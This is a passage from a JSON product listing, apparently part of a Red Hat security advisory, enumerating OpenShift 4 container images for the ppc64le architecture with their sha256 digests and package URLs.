"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3Ab26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844497"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844499"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846804"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844782"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848908"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3Ac6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3Af11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844470"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849297"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3Af27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848645"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Af50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848367"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3A605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847086"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3Afde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847840"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3A062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845937"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3Ab80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3A77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847882"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3Aa3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851387"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Adf2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851359"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3A962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849586"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848525"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3Ab45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3A52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3Acd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3Ab41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847371"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848305"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Adfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773860329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
